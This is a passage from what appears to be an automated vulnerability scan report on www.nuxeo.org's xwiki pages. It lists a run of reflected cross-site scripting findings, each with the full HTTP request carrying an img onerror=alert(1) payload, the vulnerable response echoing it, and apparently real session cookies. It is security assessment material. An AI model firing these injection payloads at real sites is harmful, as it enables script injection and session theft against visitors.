GET /xwiki/bin/view/Main/Ajax4JSF+Good+practicesbbc96<img%20src%3da%20onerror%3dalert(1)>aa677fb915a HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:00 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13071
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practicesbbc96%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eaa677fb915a'>Ajax4JSF Good practicesbbc96<img src=a onerror=alert(1)>aa677fb915a</a>
...[SNIP]...

1.48. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/AllDocs

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37093"><img%20src%3da%20onerror%3dalert(1)>9c0dc50f03a was submitted in the REST URL parameter 4. This input was echoed as 37093"><img src=a onerror=alert(1)>9c0dc50f03a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main37093"><img%20src%3da%20onerror%3dalert(1)>9c0dc50f03a/AllDocs HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:35:37 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12937
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main37093%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9c0dc50f03a/AllDocs?format=xar&amp;name=Main37093"><img src=a onerror=alert(1)>9c0dc50f03a.AllDocs&amp;pages=Main37093">
...[SNIP]...

1.49. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/AllDocs

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a70b0<img%20src%3da%20onerror%3dalert(1)>7ba7318d99e was submitted in the REST URL parameter 4. This input was echoed as a70b0<img src=a onerror=alert(1)>7ba7318d99e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maina70b0<img%20src%3da%20onerror%3dalert(1)>7ba7318d99e/AllDocs HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:35:50 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12871
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Maina70b0%3Cimg+src%3Da+onerror%3Dalert%281%29%3E7ba7318d99e/">Maina70b0<img src=a onerror=alert(1)>7ba7318d99e</a>
...[SNIP]...

1.50. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/AllDocs

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f07c4<img%20src%3da%20onerror%3dalert(1)>404e6f1a573 was submitted in the REST URL parameter 5. This input was echoed as f07c4<img src=a onerror=alert(1)>404e6f1a573 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/AllDocsf07c4<img%20src%3da%20onerror%3dalert(1)>404e6f1a573 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:36:08 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12859
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/AllDocsf07c4%3Cimg+src%3Da+onerror%3Dalert%281%29%3E404e6f1a573'>AllDocsf07c4<img src=a onerror=alert(1)>404e6f1a573</a>
...[SNIP]...

1.51. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/AllDocs

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e77a3"><img%20src%3da%20onerror%3dalert(1)>5736c0fdff5 was submitted in the REST URL parameter 5. This input was echoed as e77a3"><img src=a onerror=alert(1)>5736c0fdff5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/AllDocse77a3"><img%20src%3da%20onerror%3dalert(1)>5736c0fdff5 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:35:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12921
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/AllDocse77a3%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5736c0fdff5?format=xar&amp;name=Main.AllDocse77a3"><img src=a onerror=alert(1)>5736c0fdff5&amp;pages=Main.AllDocse77a3">
...[SNIP]...

1.52. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BlogRss

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a6af0<img%20src%3da%20onerror%3dalert(1)>9ae92ff6482 was submitted in the REST URL parameter 4. This input was echoed as a6af0<img src=a onerror=alert(1)>9ae92ff6482 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maina6af0<img%20src%3da%20onerror%3dalert(1)>9ae92ff6482/BlogRss HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:20 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12871
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Maina6af0%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9ae92ff6482/">Maina6af0<img src=a onerror=alert(1)>9ae92ff6482</a>
...[SNIP]...

1.53. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BlogRss

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9d0b"><img%20src%3da%20onerror%3dalert(1)>f559c3eb1fc was submitted in the REST URL parameter 4. This input was echoed as b9d0b"><img src=a onerror=alert(1)>f559c3eb1fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainb9d0b"><img%20src%3da%20onerror%3dalert(1)>f559c3eb1fc/BlogRss HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:12:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12937
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Mainb9d0b%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef559c3eb1fc/BlogRss?format=xar&amp;name=Mainb9d0b"><img src=a onerror=alert(1)>f559c3eb1fc.BlogRss&amp;pages=Mainb9d0b">
...[SNIP]...

1.54. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BlogRss

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ae0"><img%20src%3da%20onerror%3dalert(1)>7936f7b7411 was submitted in the REST URL parameter 5. This input was echoed as b0ae0"><img src=a onerror=alert(1)>7936f7b7411 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BlogRssb0ae0"><img%20src%3da%20onerror%3dalert(1)>7936f7b7411 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12921
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/BlogRssb0ae0%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E7936f7b7411?format=xar&amp;name=Main.BlogRssb0ae0"><img src=a onerror=alert(1)>7936f7b7411&amp;pages=Main.BlogRssb0ae0">
...[SNIP]...

1.55. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BlogRss

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f4e8d<img%20src%3da%20onerror%3dalert(1)>30d9f92f005 was submitted in the REST URL parameter 5. This input was echoed as f4e8d<img src=a onerror=alert(1)>30d9f92f005 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BlogRssf4e8d<img%20src%3da%20onerror%3dalert(1)>30d9f92f005 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:57 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12859
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/BlogRssf4e8d%3Cimg+src%3Da+onerror%3Dalert%281%29%3E30d9f92f005'>BlogRssf4e8d<img src=a onerror=alert(1)>30d9f92f005</a>
...[SNIP]...

1.56. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookAdminMoved

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4d9ef<img%20src%3da%20onerror%3dalert(1)>5eb223d685 was submitted in the REST URL parameter 4. This input was echoed as 4d9ef<img src=a onerror=alert(1)>5eb223d685 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main4d9ef<img%20src%3da%20onerror%3dalert(1)>5eb223d685/BookAdminMoved HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:02 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12949
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main4d9ef%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5eb223d685/">Main4d9ef<img src=a onerror=alert(1)>5eb223d685</a>
...[SNIP]...

1.57. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookAdminMoved

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1d8b"><img%20src%3da%20onerror%3dalert(1)>619a28fe25b was submitted in the REST URL parameter 4. This input was echoed as d1d8b"><img src=a onerror=alert(1)>619a28fe25b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maind1d8b"><img%20src%3da%20onerror%3dalert(1)>619a28fe25b/BookAdminMoved HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:06 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13028
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Maind1d8b%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E619a28fe25b/BookAdminMoved?format=xar&amp;name=Maind1d8b"><img src=a onerror=alert(1)>619a28fe25b.BookAdminMoved&amp;pages=Maind1d8b">
...[SNIP]...

1.58. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookAdminMoved

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b693d<img%20src%3da%20onerror%3dalert(1)>f1870ce447f was submitted in the REST URL parameter 5. This input was echoed as b693d<img src=a onerror=alert(1)>f1870ce447f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BookAdminMovedb693d<img%20src%3da%20onerror%3dalert(1)>f1870ce447f HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:19 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12950
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMovedb693d%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef1870ce447f'>BookAdminMovedb693d<img src=a onerror=alert(1)>f1870ce447f</a>
...[SNIP]...

1.59. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookAdminMoved

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfca7"><img%20src%3da%20onerror%3dalert(1)>92f1ed54814 was submitted in the REST URL parameter 5. This input was echoed as cfca7"><img src=a onerror=alert(1)>92f1ed54814 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BookAdminMovedcfca7"><img%20src%3da%20onerror%3dalert(1)>92f1ed54814 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13012
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/BookAdminMovedcfca7%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E92f1ed54814?format=xar&amp;name=Main.BookAdminMovedcfca7"><img src=a onerror=alert(1)>92f1ed54814&amp;pages=Main.BookAdminMovedcfca7">
...[SNIP]...

